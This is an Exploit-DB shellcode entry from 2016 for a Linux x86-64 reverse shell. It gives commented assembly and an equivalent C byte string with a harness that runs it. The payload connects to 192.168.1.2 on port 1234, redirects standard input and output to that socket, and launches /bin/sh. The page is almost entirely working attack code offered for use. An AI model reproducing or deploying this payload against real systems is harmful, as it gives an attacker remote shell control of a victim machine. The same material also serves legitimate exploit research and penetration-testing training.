Linux/x64 - Reverse (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)

EDB-ID:

39578

Size:

134 bytes
EDB Verified:

Author:

Sudhanshu Chauhan

Type:

shellcode
Shellcode:   /  

Platform:

Linux_x86-64

Published:

2016-03-21
  
/*
# Exploit Title: Shellcode [Linux x86_64 Reverse Shell]
# Date: 19/03/2016
# Shellcode Author: Sudhanshu Chauhan
# LinkedIn: https://in.linkedin.com/in/sudhanshuchauhan
# Tested on: [Ubuntu 14.04.1 x86_64]

global _start


_start:

	;Socket
	xor rax, rax
	xor rdi, rdi
	xor rsi, rsi
	xor rdx, rdx
	add rax, 41
	add rdi, 2
	add rsi, 1
	syscall

	; copy socket descriptor
	mov rdi, rax

	; Socket details IP- 192.168.1.2 Port- 1234
	xor rax, rax 
	push rax
	mov dword [rsp-4], 0x0201a8c0
	mov word [rsp-6], 0xd204
	sub rsp, 6
	push word 0x2


	;connect
	xor rax, rax
	xor rdx, rdx
	add rax, 42
	mov rsi, rsp
	add rdx, 16
	syscall


    ;duplicate sockets
	xor rax, rax
	add rax, 33
	xor rsi, rsi	
	syscall
	
	mov al, 33
	add rsi, 1
	syscall

	mov al, 33
	add rsi, 1
	syscall	

    ; execve
    xor rax, rax
    push rax
    mov rbx, 0x68732f2f6e69622f
    push rbx
    mov rdi, rsp
    push rax
    mov rdx, rsp
    push rdi
    mov rsi, rsp
    add rax, 59
    syscall
 
*/

#include <stdio.h>
#include<string.h>
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x29\x48\x83\xc7\x02\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x04\xd2\x48\x83\xec\x06\x66\x6a\x02\x48\x31\xc0\x48\x31\xd2\x48\x83\xc0\x2a\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
 
main()
{
    printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
    int (*ret)() = (int(*)())code;
    ret();
}
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services